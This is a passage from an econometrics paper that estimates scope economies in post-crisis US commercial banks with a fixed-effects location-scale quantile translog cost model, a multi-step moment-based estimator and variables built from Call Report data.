To further avoid excessive extrapolation, we restrict the choice of \(\{\omega_{m}\}\) to the "admissible region" defined by the two data-driven constraints, following Evans and Heckman (1984). First, each counterfactual bank is ensured to not produce less of each output than banks do in the sample. That is, we require that \(\omega_{m}^{\kappa}Y_{m}\geq\min\{Y_{m}\}\) for all \(m=1,2,3\) and \(\kappa\in\{A,B,C\}\). The second constraint ensures that each counterfactual bank does not specialize in either one of the outputs to a greater extent than banks do in the sample. In other words, ratios of output quantities for each counterfactual bank must fall in the range of such ratios observed in the data, i.e., for any pair \(Y_{m}\) and \(Y_{m^{\prime}}\): \[\min\left\{\frac{Y_{m}}{Y_{m^{\prime}}}\right\}\leq\frac{\varpi_{m}^{\kappa}Y_{ m}^{\ast}+\min\{Y_{m}\}}{\varpi_{m^{\prime}}^{\kappa}Y_{m^{\prime}}^{\ast}+ \min\{Y_{m^{\prime}}\}}\leq\max\left\{\frac{Y_{m}}{Y_{m^{\prime}}}\right\}, \tag{2.3}\] where \(Y_{m}^{\ast}=Y_{m}-3\times\min\{Y_{m}\}\) for all \(m=1,2,3\). Thus, we examine the _within-sample_ scope economies. The quantitative measure of cost subadditivity \(\mathcal{S}_{t}\) (in proportions) is obtained by dividing the expression in (2.2) by \(\mathcal{C}_{t}(Y_{1},Y_{2},Y_{3})\): \[\mathcal{S}_{t}=\frac{\sum_{\kappa\in\{A,B,C\}}\mathcal{C}_{t} \Big{(}\varpi_{1}^{\kappa}Y_{1}^{\ast}+\min\{Y_{1}\},\varpi_{2}^{\kappa}Y_{2}^ {\ast}+\min\{Y_{2}\},\varpi_{3}^{\kappa}Y_{3}^{\ast}+\min\{Y_{3}\}\Big{)}- \mathcal{C}_{t}\big{(}Y_{1},Y_{2},Y_{3}\big{)}}{\mathcal{C}_{t}\big{(}Y_{1}, Y_{2},Y_{3}\big{)}}, \tag{2.4}\] where the counterfactual costs under the summation operator have been redefined in order to operationalize the first of the two constraints characterizing the admissible region. Positive (negative) values of \(\mathcal{S}_{t}\) provide evidence of scope economies (_dis_economies); while a zero value suggests scope invariance of the bank's cost structure. Clearly however, the value of \(\mathcal{S}_{t}\) depends on the choice of distribution weights \(\{\varpi_{m}^{\kappa}\}\). To test for scope economies, we adopt a conservative approach to measuring cost subadditivity, whereby \(\{\varpi_{m}^{\kappa}\}\) are chosen such that the corresponding \(\mathcal{S}_{t}\) is the smallest. With this, "the" measure of cost subadditivity (for each bank-year) is \[\mathcal{S}_{t}^{\ast}=\min_{\{\varpi_{m}^{\kappa}\}}\mathcal{S}_{t} \big{(}\varpi_{m}^{\kappa};\;m=1,2,3;\kappa\in\{A,B,C\}\big{)}\;. \tag{2.5}\] The rationale is as follows. If the _smallest_ subadditivity measure is still positive, then one can quite safely infer that scope economies are locally significant over the bank's feasible output space in a given year. Thus, the main hypothesis of interest is as follows. Hypothesis.--_Consistent with scope economies at time \(t\), the cost subadditivity measure \(\mathcal{S}_{t}^{\ast}>0\)._ ## 3 Empirical Model We estimate the banks dual variable cost function \(\mathcal{C}_{t}(\cdot)\) at different conditional quantiles of costs. Let \(C_{it}\) be the variable cost of a bank \(i=1,\ldots,n\) in year \(t=1,\ldots,T\) and \(\mathbf{V}_{it}=(\mathbf{Y}_{it}^{\prime},\mathbf{W}_{it}^{\prime},\mathbf{K}_{it}^{\prime})^{\prime}\) be the vector of (strictly exogenous) cost-function regressors. We use lower case of \(C_{it}\) and \(\mathbf{V}_{it}\) in the following to denote the log transformations of the variables: e.g., \(\mathbf{v}_{it}=\ln\mathbf{V}_{it}\). 
Letting the bank's variable cost structure be of the translog3 form and described by a location-scale model a la Koenker and Bassett (1982) extended to accommodate bank fixed effects and time-varying coefficients, we have

Footnote 3: Quadratic log-polynomial.

\[c_{it}=\big[\beta_{0}+\beta_{0}^{*}L(t)\big]+\big[\mathbf{\beta}_{1}+\mathbf{\beta}_{1}^{*}L(t)\big]^{\prime}\mathbf{v}_{it}+\tfrac{1}{2}\big[\mathbf{\beta}_{2}+\mathbf{\beta}_{2}^{*}L(t)\big]^{\prime}\text{vec}\big(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\big)+\lambda_{i}+u_{it}, \tag{3.1}\]

with

\[u_{it}=\Big(\big[\gamma_{0}+\gamma_{0}^{*}S(t)\big]+\big[\mathbf{\gamma}_{1}+\mathbf{\gamma}_{1}^{*}S(t)\big]^{\prime}\mathbf{v}_{it}+\tfrac{1}{2}\big[\mathbf{\gamma}_{2}+\mathbf{\gamma}_{2}^{*}S(t)\big]^{\prime}\text{vec}\big(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\big)+\sigma_{i}\Big)\varepsilon_{it}, \tag{3.2}\]

where \(\left(\beta_{0},\mathbf{\beta}_{1}^{\prime},\mathbf{\beta}_{2}^{\prime},\beta_{0}^{*},\mathbf{\beta}_{1}^{*\prime},\mathbf{\beta}_{2}^{*\prime}\right)^{\prime}\) are unknown location-function coefficients; \(\left(\gamma_{0},\mathbf{\gamma}_{1}^{\prime},\mathbf{\gamma}_{2}^{\prime},\gamma_{0}^{*},\mathbf{\gamma}_{1}^{*\prime},\mathbf{\gamma}_{2}^{*\prime}\right)^{\prime}\) are unknown scale-function coefficients; and \(\lambda_{i}\) and \(\sigma_{i}\) are the unobserved bank-specific location and scale fixed effects, respectively.

To allow for technological change in the bank cost structure, we borrow from Baltagi and Griffin (1988) and introduce two scalar time indices \(L(t)\) and \(S(t)\). Both time indices are unobservable and can be thought of as unknown functions of time. Such time indices are advantageous over simple trends (including quadratic) in modeling temporal changes because they provide richer variation in the measurement of technological change and a much closer approximation to observed temporal changes than simple time trends do. Note that index \(L(t)\) enters the location function non-neutrally, shifting not only the intercept \(\beta_{0}+\beta_{0}^{*}L(t)\) but also the linear \(\mathbf{\beta}_{1}+\mathbf{\beta}_{1}^{*}L(t)\) and quadratic slopes \(\mathbf{\beta}_{2}+\mathbf{\beta}_{2}^{*}L(t)\), thereby allowing for flexible locational shifts in the costs over time. Analogous scale changes over time are allowed by means of \(S(t)\). In all, by means of the time indices in both the location and scale functions, we are able to accommodate temporal changes in the _entire_ conditional cost distribution.

Essentially, our model in (3.1)-(3.2) is a generalization of the popular translog cost-function specification: all parameters now vary with time; the covariates affect not only the location (centrality) but also the scale (variability) of the conditional cost distribution; and the bank fixed effects are both location- and scale-shifting. The two equations together facilitate a quantile analysis of the bank's cost structure; a small simulation sketch below illustrates these location-scale mechanics.
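As a quick illustration of why a location-scale specification lets covariates shift the entire conditional distribution rather than just its center, the following minimal simulation sketch (ours; the single-regressor setup, coefficient values and variable names are purely illustrative and not part of the paper's estimation) verifies numerically that the \(\tau\)th conditional quantile of the outcome has slope \(\beta_{1}+\gamma_{1}q_{\tau}\).

```python
import numpy as np

rng = np.random.default_rng(0)

# Illustrative location-scale data-generating process with one regressor:
#   c = (b0 + b1*v) + (g0 + g1*v) * eps,  with the scale kept strictly positive.
b0, b1 = 1.0, 0.8      # location coefficients
g0, g1 = 0.5, 0.3      # scale coefficients
n = 200_000

v = rng.uniform(1.0, 3.0, size=n)          # ensures g0 + g1*v > 0
eps = rng.standard_normal(n)               # illustrative error (normalization of E|eps| omitted)
c = (b0 + b1 * v) + (g0 + g1 * v) * eps

tau = 0.75
q_tau = np.quantile(eps, tau)              # unconditional tau-quantile of eps

# Implied quantile slope from the location-scale structure: b1 + g1*q_tau.
print("implied slope :", b1 + g1 * q_tau)

# Crude empirical check: conditional tau-quantiles of c within narrow bins of v,
# then a least-squares fit of those bin quantiles on the bin midpoints.
bins = np.linspace(1.0, 3.0, 21)
mids, qs = [], []
for lo, hi in zip(bins[:-1], bins[1:]):
    mask = (v >= lo) & (v < hi)
    mids.append(0.5 * (lo + hi))
    qs.append(np.quantile(c[mask], tau))
slope_hat = np.polyfit(mids, qs, 1)[0]
print("empirical slope:", slope_hat)       # approximately b1 + g1*q_tau
```

The same logic, applied to the full translog specification with time indices and fixed effects, delivers the quantile-specific "composite" coefficients derived next.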
Along the lines of Machado and Santos Silva (2019), upon whom we build our estimation procedure, we assume that (_i_) \(\varepsilon_{it}\) is \(i.i.d.\) across \(i\) and \(t\) with some cdf \(F_{\varepsilon}\); (_ii_) \(\varepsilon_{it}\perp\mathbf{v}_{it}\) with the normalizations that \(\mathbb{E}\left[\varepsilon_{it}\right]=0\) and \(\mathbb{E}\left[\left|\varepsilon_{it}\right|\right]=1\); and (_iii_) \(\Pr\big[\left[\gamma_{0}+\gamma_{0}^{*}S(t)\right]+\left[\mathbf{\gamma}_{1}+\mathbf{\gamma}_{1}^{*}S(t)\right]^{\prime}\mathbf{v}_{it}+\frac{1}{2}\left[\mathbf{\gamma}_{2}+\mathbf{\gamma}_{2}^{*}S(t)\right]^{\prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)+\sigma_{i}>0\big]=1\). Then, for any given quantile index \(\tau\in(0,1)\), the \(\tau\)th conditional quantile function of the log-cost \(c_{it}\) implied by (3.1)-(3.2) is

\[\mathcal{Q}_{c}\left[\tau|\mathbf{v}_{it}\right]=\underbrace{\left[\beta_{0}+\gamma_{0}q_{\tau}+\beta_{0}^{*}L(t)+\gamma_{0}^{*}S(t)q_{\tau}\right]}_{t\text{-varying quantile intercept}}+\underbrace{\left[\mathbf{\beta}_{1}+\mathbf{\gamma}_{1}q_{\tau}+\mathbf{\beta}_{1}^{*}L(t)+\mathbf{\gamma}_{1}^{*}S(t)q_{\tau}\right]^{\prime}}_{t\text{-varying linear quantile slopes}}\mathbf{v}_{it}+\frac{1}{2}\underbrace{\left[\mathbf{\beta}_{2}+\mathbf{\gamma}_{2}q_{\tau}+\mathbf{\beta}_{2}^{*}L(t)+\mathbf{\gamma}_{2}^{*}S(t)q_{\tau}\right]^{\prime}}_{t\text{-varying quadratic quantile slopes}}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)+\underbrace{\left[\lambda_{i}+\sigma_{i}q_{\tau}\right]}_{\text{individual quantile fixed effect}}, \tag{3.3}\]

where \(q_{\tau}=F_{\varepsilon}^{-1}(\tau)\) is the (unknown) \(\tau\)th quantile of \(\varepsilon_{it}\). The translog cost model in (3.3) is quantile-specific because all bracketed "composite" coefficients vary not only with time but also with the cost quantile \(\tau\). Furthermore, the technological change in the cost frontier is also quantile-specific, thereby allowing for heterogeneous temporal shifts across the entire cost distribution as opposed to a shift in the mean only. The unobserved bank fixed effect inside the last brackets is also quantile-specific. Thus, quantile model (3.3) can be rewritten compactly as

\[\mathcal{Q}_{c}\left[\tau|\mathbf{v}_{it}\right]\equiv\alpha_{0}(\tau,t)+\mathbf{\alpha}_{1}(\tau,t)^{\prime}\mathbf{v}_{it}+\frac{1}{2}\mathbf{\alpha}_{2}(\tau,t)^{\prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)+\mu_{i,\tau}, \tag{3.4}\]

with the "alpha" coefficients corresponding to the bracketed expressions in (3.3) and \(\mu_{i,\tau}\equiv\lambda_{i}+\sigma_{i}q_{\tau}\).

We opt to begin with the location-scale model to derive the conditional quantile function of interest in (3.3), as opposed to postulating a quantile regression a la (3.4) _prima facie_, because we seek to estimate these quantiles _indirectly_. This is motivated by the presence of unobserved fixed effects in the quantile model. Namely, since there is no known general transformation that can purge unit fixed effects from the quantile model (owing to nonlinearity of the quantile operator), the routine check-function-based estimators proceed to _directly_ estimate a vector of individual effects by means of including a full set of unit dummies. However, as noted by Koenker (2004), the introduction of a large number of unit fixed effects significantly inflates the variability of estimates of the main parameters of interest, i.e., the slope coefficients.
Furthermore, the optimization of an \(L_{1}\)-norm corresponding to the check-function-based estimators, when there is a large number of binary variables and the associated parameters to be estimated, is well-known to be computationally cumbersome and oftentimes intractable in practice.4 The traditional solution to this assumes that unit fixed effects are only location-shifting and regularizes these individual effects by shrinking them to a common value (see Koenker, 2004; Lamarche, 2010), but these estimators have gained little popularity in applied work largely because of their complexity. While there is an alternative fixed-effect quantile estimator proposed by Canay (2011) that requires no regularization and is notably simpler to implement, it continues to assume that the unit fixed effects have a pure location shift effect. Using the notation of (3.4), this is tantamount to assuming that \(\mu_{i,\tau}=\mu_{i}\) for all \(\tau\). Furthermore, none of these check-function-based estimators guarantee that the estimates of regression quantiles do not cross, which is a pervasive but oft-ignored problem in applied work. We therefore adopt the approach recently proposed by Machado and Santos Silva (2019) that allows an easy-to-implement _indirect_ estimation of the quantile parameters via moments, where all parameters are estimated based on the moments implied by the location-scale model in (3.1)-(3.2). Besides its relative computational simplicity, this approach is advantageous for its ability to control for unobserved unit heterogeneity that is both location- and scale-shifting: the individual effects are allowed to affect the entire distribution rather than just shifting its location (therefore, \(\{\mu_{i,\tau}\}\) are also quantile-specific). Lastly but not least importantly, this moment-based approach can be easily applied to nonlinear-in-parameters models (like ours is) and produces non-crossing quantile regressions. Footnote 4: For instance, in our empirical application \(n>7,500\). To operationalize the estimator, we model unobservable \(L(t)\) and \(S(t)\) via discretization. For each \(\kappa=1,\ldots,T\), define the dummy variable \(D_{\kappa,t}\) that is equal to \(1\) in the \(\kappa\)th time period and \(0\) otherwise. Then, we discretize time indices as \(L(t)=\sum_{\kappa=2}^{T}\eta_{\kappa}D_{\kappa,t}\) and \(S(t)=\sum_{\kappa=2}^{T}\theta_{\kappa}D_{\kappa,t}\), where \(L(1)=\eta_{1}=0\) and \(S(1)=\theta_{1}=0\) are normalized for identification. Parameter identification also requires that both \(\beta_{0}^{*}\) and \(\gamma_{0}^{*}\) be normalized; we set \(\beta_{0}^{*}=\gamma_{0}^{*}=1\). Under these identifying normalizations, \(\beta_{0}\), \(\mathbf{\beta}_{1}\), \(\gamma_{0}\) and \(\mathbf{\gamma}_{1}\) are naturally interpretable as "reference" coefficients in time period \(t=1\). 
Then, a feasible analogue of the \(\tau\)th conditional cost quantile in (3.3) is given by \[Q_{c}\left[\tau|\mathbf{v}_{it}\right] =\left[\beta_{0}+\gamma_{0}q_{\tau}+\sum_{\kappa}(\eta_{\kappa}+ \theta_{\kappa}q_{\tau})D_{\kappa,t}\right]+\left[\mathbf{\beta}_{1}+\mathbf{\gamma}_{ 1}q_{\tau}+\sum_{\kappa}(\mathbf{\beta}_{1}^{*}\eta_{\kappa}+\mathbf{\gamma}_{1}^{*} \theta_{\kappa}q_{\tau})D_{\kappa,t}\right]^{\prime}\mathbf{v}_{it}+\] \[\frac{1}{2}\left[\mathbf{\beta}_{2}+\mathbf{\gamma}_{2}q_{\tau}+\sum_{ \kappa}(\mathbf{\beta}_{2}^{*}\eta_{\kappa}+\mathbf{\gamma}_{2}^{*}\theta_{\kappa}q_{ \tau})D_{\kappa,t}\right]^{\prime}\mathrm{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{ \prime}\right)+\left[\lambda_{i}+\sigma_{i}q_{\tau}\right]. \tag{3.5}\] Two remarks are in order. First, the discretized parameterization of the unknown \(L(t)\) and \(S(t)\) is akin to a nonparametric local-constant estimation of these unknown functions of time with the bandwidth parameter being set to \(0\). Second, though it might appear at first that, when \(L(t)\) and \(S(t)\) are modeled us ing a series of time dummies, we obtain the time-varying slope coefficients on \(\mathbf{v}_{it}\) by merely interacting the latter with time dummies and adding them as additional regressors, this is _not_ the case here because time dummies are restricted to have the same parameters \(\{\eta_{k}\}\) and \(\{\theta_{k}\}\) both when entering additively as well as when interacting with \(\mathbf{v}_{it}\). Thus, the location and scale functions are not "fully saturated" specification but, in fact, are more parsimonious _nonlinear_ (in parameters) functions with much fewer unknown parameters. In avoiding a fully saturated specification that is equivalent to sample-splitting into cross-sections, we accommodate time-invariant bank fixed effects. ### Estimation Procedure Although the estimation of (3.3) [or (3.5)] can be done in one step via nonlinear method of moments, we adopt a multi-step procedure that is significantly easier to implement. This is possible because the moments implied by model (3.1)-(3.2) and its assumptions are sequential in nature. In other words, we can first estimate parameters of the location function and then those of the scale function in two separate steps. After that, based on the estimates of these parameters, the third step is taken to estimate unknown quantiles and, ultimately, recover time-varying quantile coefficients in (3.3). In what follows, we briefly describe this procedure, with more details available in Appendix A. **Step 1.** We first estimate parameters of the location function. For ease of notation, let \(\mathbf{D}_{t}=[D_{2,t},\ldots,D_{T,t}]^{t}\) and \(\mathbf{\eta}=[\eta_{2},\ldots,\eta_{T}]^{t}\). Under the assumption (_ii_), from (3.1) it follows that the conditional mean function of the log-cost \(c_{it}\) is \[\mathbb{E}\left[c_{it}|\mathbf{v}_{it},\mathbf{D}_{t}\right]=\beta_{0}+\mathbf{\eta}^{ \prime}\mathbf{D}_{t}+\left[\mathbf{\beta}_{1}+\mathbf{\eta}^{\prime}\mathbf{D}_{t}\cdot\mathbf{ \beta}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}+\frac{1}{2}\left[\mathbf{\beta}_{2}+\bm {\eta}^{\prime}\mathbf{D}_{t}\cdot\mathbf{\beta}_{2}^{*}\right]^{\prime}\text{vec} \left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)+\lambda_{i}, \tag{3.6}\] which can be consistently estimated in the within-transformed form via nonlinear least squares after purging additive location fixed effects. 
Having obtained the nonlinear fixed-effects estimates of the slope coefficients \(\left(\mathbf{\tilde{\eta}}^{\prime},\mathbf{\tilde{\beta}}_{1}^{\prime},\mathbf{\tilde{ \beta}}_{2}^{\prime},\mathbf{\tilde{\beta}}_{2}^{*}\right)^{\prime}\), we can then recover the location-shifting intercept \(\beta_{0}\) and fixed effects \(\{\lambda_{i}\}\) under the usual \(\sum_{i=1}^{n}\lambda_{i}=0\) normalization: \[\widehat{\beta}_{0} =\frac{1}{nT}\sum_{i}\sum_{t}\left(c_{it}-\mathbf{\tilde{\eta}}^{ \prime}\mathbf{D}_{t}-\left[\mathbf{\tilde{\beta}}_{1}+\mathbf{\tilde{\eta}}^{\prime}\bm {D}_{t}\cdot\mathbf{\tilde{\beta}}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}-\frac{1}{2} \left[\mathbf{\tilde{\beta}}_{2}+\mathbf{\tilde{\eta}}^{\prime}\mathbf{D}_{t}\cdot\mathbf{ \tilde{\beta}}_{2}^{*}\right]^{\prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^ {\prime}\right)\right), \tag{3.7}\] \[\widehat{\lambda}_{i} =\frac{1}{T}\sum_{t}\left(c_{it}-\widehat{\beta}_{0}-\mathbf{\tilde{ \eta}}^{\prime}\mathbf{D}_{t}-\left[\mathbf{\tilde{\beta}}_{1}+\mathbf{\tilde{\eta}}^{ \prime}\mathbf{D}_{t}\cdot\mathbf{\tilde{\beta}}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}- \frac{1}{2}\left[\mathbf{\tilde{\beta}}_{2}+\mathbf{\tilde{\eta}}^{\prime}\mathbf{D}_{t} \cdot\mathbf{\tilde{\beta}}_{2}^{*}\right]^{\prime}\text{vec}\left(\mathbf{v}_{it}\bm {v}_{it}^{\prime}\right)\right)\forall i. \tag{3.8}\] Hence, the residual is \(\widehat{u}_{it}=c_{it}-\widehat{\beta}_{0}-\mathbf{\tilde{\eta}}^{\prime}\mathbf{D}_{t }-\left[\mathbf{\tilde{\beta}}_{1}+\mathbf{\tilde{\eta}}^{\prime}\mathbf{D}_{t}\cdot\mathbf{ \tilde{\beta}}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}-\frac{1}{2}\left[\mathbf{\tilde{ \beta}}_{2}+\mathbf{\tilde{\eta}}^{\prime}\mathbf{D}_{t}\cdot\mathbf{\tilde{\beta}}_{2}^ {*}\right]^{\prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)- \widehat{\lambda}_{i}\). **Step 2.** We then estimate parameters of the scale function. Based on the assumptions (_ii_)-(_iii_), we have an auxiliary conditional mean regression: \[\mathbb{E}\left[|u_{it}|\mathbf{v}_{it},\mathbf{D}_{t}\right]=\gamma_{0}+\mathbf{\theta}^{ \prime}\mathbf{D}_{t}+\left[\mathbf{\gamma}_{1}+\mathbf{\theta}^{\prime}\mathbf{D}_{t}\cdot \mathbf{\gamma}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}+\frac{1}{2}\left[\mathbf{\gamma}_{2 }+\mathbf{\theta}^{\prime}\mathbf{D}_{t}\cdot\mathbf{\gamma}_{2}^{*}\right]^{\prime}\text{ vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)+\sigma_{i}, \tag{3.9}\] where \(\mathbf{\theta}=[\theta_{2},\ldots,\theta_{T}]^{\prime}\) and which, just like in the first step, we can estimate via nonlinear least squares after within-transforming scale fixed effects out. This yields the estimates of the scale-function slope coefficients \(\left(\mathbf{\tilde{\theta}}^{\prime},\mathbf{\tilde{\gamma}}_{1}^{\prime},\mathbf{\tilde{ \gamma}}_{1}^{*},\mathbf{\tilde{\gamma}}_{2}^{\prime},\mathbf{\tilde{\gamma}}_{2}^{*} \right)^{\prime}\). 
To recover the scale-shifting intercept \(\gamma_{0}\) and fixed effects \(\{\sigma_{i}\}\), use \(\sum_{i=1}^{n}\sigma_{i}=0\): \[\widehat{\gamma}_{0} =\frac{1}{nT}\sum_{i}\sum_{t}\left(\left|\widehat{u}_{it}\right|- \widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}-\left[\widehat{\mathbf{\gamma}}_{1}+ \widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}\cdot\widehat{\mathbf{\gamma}}_{1}^{*} \right]^{\prime}\mathbf{v}_{it}-\frac{1}{2}\left[\widehat{\mathbf{\gamma}}_{2}+ \widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}\cdot\widehat{\mathbf{\gamma}}_{2}^{*} \right]^{\prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)\right), \tag{3.10}\] \[\widehat{\sigma}_{i} =\frac{1}{T}\sum_{t}\left(\left|\widehat{u}_{it}\right|-\widehat {\gamma}_{0}-\widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}-\left[\widehat{\mathbf{ \gamma}}_{1}+\widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}\cdot\widehat{\mathbf{\gamma }}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}-\frac{1}{2}\left[\widehat{\mathbf{\gamma}}_ {2}+\widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}\cdot\widehat{\mathbf{\gamma}}_{2}^{*} \right]^{\prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)\right) \forall i. \tag{3.11}\] **Step 3.** For any given quantile index \(0<\tau<1\) of interest, we next estimate the unconditional quantile of \(\varepsilon_{it}\). From (3.2), we have the conditional quantile function of \(u_{it}\): \[\mathcal{Q}_{u}\left[\tau|\mathbf{v}_{it},\mathbf{D}_{t}\right]=\left(\gamma_{0}+\mathbf{ \theta}^{\prime}\mathbf{D}_{t}+\left[\mathbf{\gamma}_{1}+\mathbf{\theta}^{\prime}\mathbf{D}_{ t}\cdot\mathbf{\gamma}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}+\frac{1}{2}\left[\mathbf{ \gamma}_{2}+\mathbf{\theta}^{\prime}\mathbf{D}_{t}\cdot\mathbf{\gamma}_{2}^{*}\right]^{ \prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right)+\sigma_{i} \right)\!q_{\tau}, \tag{3.12}\] and therefore we can estimate \(q_{\tau}\) via the standard quantile regression of \(\widehat{u}_{it}\) from Step 1 on \(\left(\widehat{\gamma}_{0}+\widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}+\left[ \widehat{\mathbf{\gamma}}_{1}+\widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}\cdot\widehat {\mathbf{\gamma}}_{1}^{*}\right]^{\prime}\mathbf{v}_{it}+\frac{1}{2}\left[\widehat{\bm {\gamma}}_{2}+\widehat{\mathbf{\theta}}^{\prime}\mathbf{D}_{t}\cdot\widehat{\mathbf{\gamma} }_{2}^{*}\right]^{\prime}\text{vec}\left(\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\right) +\widehat{\sigma}_{i}\right)\) from Step 2, with no intercept. With all unknown parameters now estimated, we can construct the estimator of the feasible analogue of the \(\tau\)th conditional quantile of the log-cost in (3.5). For statistical inference, we use bootstrap. To correct for finite-sample biases, we employ Efron's (1982) bias-corrected bootstrap percentile confidence intervals. Bootstrap also significantly simplifies testing because, owing to a multi-step nature of our estimator, computation of the asymptotic variance of the parameter estimators is not trivial. Due to the panel structure of data, we use wild residual _block_ bootstrap, thereby taking into account the potential dependence in residuals within each bank over time. Details are provided in Appendix B. ## 4 Data The bank-level data come from the Reports of Condition and Income (the so-called Call Reports) and the Uniform Bank Performance Reports (UBPRs). We obtain annual year-end data for all FDIC-insured commercial banks between 2009 and 2018. 
As already discussed at length, we focus on the post-financial-crisis period. Consistent with the widely accepted Sealey and Lindley's (1977) "intermediation approach" to formalizing production in banking, we define the bank's cost-function arguments as follows. The two traditional interest-income-centered outputs are \(Y_{1}\) -- total loans, which include real estate loans, agricultural loans, commercial and industrial loans, individual consumer loans and other loans, and \(Y_{2}\) -- total securities, which is the sum of securities held-to-maturity and securities held-for-sale. These output categories are conventional and the same as those considered by, e.g., Koetter et al. (2012) and Wheelock and Wilson (2020). The third output included in our analysis (\(Y_{3}\)) measures nontraditional off-balance sheet operations. We use a sum of credit-equivalent measures of the bank's various off-balance sheet operations as a proxy for its involvement in nontraditional activities. Namely, we convert off-balance sheet items into their _credit equivalents_ which we determine using credit conversion factors that account for the varying credit risk of different nontraditional banking operations.5 This facilitates comparability of (traditional) on- and (nontraditional) off-balance sheet activities in the analysis of banking production, which makes it a popular practice in the literature (e.g., Jagtiani and Khanthavit, 1996; Hughes and Mester, 1998; Stiroh, 2000; Clark and Siems, 2002; Berger and Mester, 2003; Asaftei, 2008; Hughes and Mester, 2013; Wheelock and Wilson, 2020). More concretely, following McCord and Prescott (2014) and the FFIEC 041 Reports, we compute \(Y_{3}\) by summing credit-equivalent amounts of all off-balance sheet items. For instance, in 2015-2018, Call Reports define these items as off-balance sheet securitization exposures, financial standby letters of credit, performance standby letters of credit and transaction-related contingent items, commercial and similar letters of credit with an original maturity of one year or less, retained recourse on small business obligations sold with recourse, repo-style transactions, unused commitments excluding unused commitments to asset backed commercial paper conduits, unconditionally cancelable commitments, over-the-counter derivatives, centrally cleared derivatives, and all other off-balance sheet liabilities. We opt for the credit equivalent of off-balance sheet activities over another popular alternative proxy for banks' nontraditional operations based on net non-interest income (e.g., DeYoung and Rice, 2004; DeYoung and Torna, 2013; Lozano-Vivas and Pasiouras, 2010; Davies and Tracey, 2014; Malikov et al., 2015; Wheelock and Wilson, 2012, 2018) because the latter can be negative, which makes it an undesirable measure for one of the bank's outputs (see Hughes and Mester, 1998). It is, perhaps, even less suitable a measure for an "output" in the structural production analysis because of its fundamental conceptual incongruity with how the bank's other outputs are measured following the convention in the literature: namely, it is based on a "flow" (income) data whereas loans \(Y_{1}\) and securities \(Y_{2}\) are the "stock" (asset) measures. No such issue arises when using credit equivalents of off-balance sheet items. Having said that, we also redo our analysis using this alternative income-based measure of nontraditional activities in one of the robustness checks. 
In this case, following the literature, the \(Y_{3}\) variable is measured using the total non-interest income (inclusive of the income from fiduciary activities, securities brokerage, investment banking, insurance activities, venture capital and the trading revenue) minus service charges on deposit accounts.

The three variable inputs are \(X_{1}\) -- physical capital measured by fixed assets, \(X_{2}\) -- labor, measured as the number of full-time equivalent employees, and \(X_{3}\) -- total borrowed funds, inclusive of deposits and federal funds. Their respective prices are \(W_{1}\), \(W_{2}\) and \(W_{3}\), where \(W_{1}\) is measured as the expenditures on fixed assets divided by premises and fixed assets, \(W_{2}\) is computed by dividing salaries and employee benefits by the number of full-time equivalent employees, and \(W_{3}\) is computed as the interest expenses on deposits and fed funds divided by the sum of total deposits and fed funds purchased. Total variable cost \(C\) is a sum of expenses on \(X_{1}\), \(X_{2}\) and \(X_{3}\).

We also consider equity capital \(K_{1}\) as an additional input. However, due to the unavailability of the price of equity, we follow Berger and Mester (2003) and Feng and Serletis (2010) in modeling \(K_{1}\) as a quasi-fixed input. The treatment of equity as an input to banking production technology is consistent with Hughes and Mester (1993, 1998) and Berger and Mester (2003) in that banks may use it as a source of loanable funds and thus as a cushion against losses. By including equity \(K_{1}\) in the cost analysis, we are therefore also able to control for the bank's insolvency risk along the lines of Hughes and Mester's (2003) arguments, whereby "an increase in financial capital reduces the probability of insolvency and provides an incentive for allocating additional resources to manage risk in order to protect the larger equity stake" (p.314). In effect, conditioning the bank's cost on financial capital also allows controlling for quality of loans since the latter is influenced by risk preferences: as Mester (1996) explains, risk-averse bank managers may choose to fund their loans with higher equity-to-deposits ratios (and thus less debt) than a risk-neutral bank would.

In our analysis, we also condition the bank's cost on two other proxy measures of output quality reflective of credit risk associated with the likelihood that borrowers default on their loans and accrued interest by failing to make payments as contractually obligated. We include the two most commonly used proxies: the ratio of nonperforming assets to total assets \(K_{2}\) (e.g., Hughes and Mester, 2013; Wheelock and Wilson, 2018, 2020) and the ratio of loan loss provision to total assets \(K_{3}\) (e.g., see Laeven and Majnoni, 2003; Acharya et al., 2006; Berger et al., 2010).6 Obviously, banks' expectations of credit risk are unobservable but, as noted by Berger et al. (2010), while the former proxy is an _ex-post_ measure of the actual incurred losses from lending, the loan loss provisions can be interpreted as an _ex-ante_ measure of the level of expected losses and thus as a proxy for expected quality of assets. Controlling for both when modeling bank costs is imperative because lower-quality assets generally require more resources to manage a higher-level risk exposure, thereby raising the costs for banks (see Hughes and Mester, 2013).
